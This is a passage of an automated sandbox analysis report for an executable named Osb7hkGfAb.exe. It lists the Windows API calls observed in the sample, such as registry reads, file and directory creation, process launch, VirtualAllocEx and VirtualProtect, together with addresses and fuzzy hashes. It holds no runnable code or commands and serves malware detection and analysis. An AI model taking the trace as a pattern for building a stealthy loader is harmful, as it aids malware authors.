                                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                          • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                          APIs
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                                          Strings
                                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                          • API String ID: 1892508949-448873956
                                                                          • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                          • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                          • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID: Call
                                                                          • API String ID: 3356406503-1824292864
                                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                          Strings
                                                                          • Error launching installer, xrefs: 004057A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                          APIs
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseValue
                                                                          • String ID:
                                                                          • API String ID: 397863658-0
                                                                          • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                          • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                          • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                          • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                          • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                                          • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                          • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          APIs
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CloseDeleteValue
                                                                          • String ID:
                                                                          • API String ID: 2831762973-0
                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Window$EnableShow
                                                                          • String ID:
                                                                          • API String ID: 1136574915-0
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 700E2AF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: wsprintf
                                                                          • String ID:
                                                                          • API String ID: 2111968516-0
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: FileMove
                                                                          • String ID:
                                                                          • API String ID: 3562171763-0
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: FilePointerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 327478801-0
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
• Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
• Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
• Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
APIs
• SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: PathSearch
• String ID:
• API String ID: 2203818243-0
• Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
• Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
• Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
• Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
APIs
• RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
• Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
• Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
• Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
• Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
• Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
• Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
• Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
• Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
APIs
• VirtualProtect.KERNELBASE(700E404C,00000004,00000040,700E403C), ref: 700E293F
Memory Dump Source
• Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
• Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 3dc4ba8ca52d7204692d01d87351ad0c870eebcbd1fdd47e623c5d9c5960a16a
• Instruction ID: 229504b8f0cc91d0f9e9525968ba653d8c3adf6f9ccb5be4444e40812d19fc79
• Opcode Fuzzy Hash: 3dc4ba8ca52d7204692d01d87351ad0c870eebcbd1fdd47e623c5d9c5960a16a
• Instruction Fuzzy Hash: 4EF028B3914240DEE3A0EF7B9CC47093FE1A715E75B21457AE768F6261E3B445448B11
APIs
• GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
• Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
• Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
• Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
APIs
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
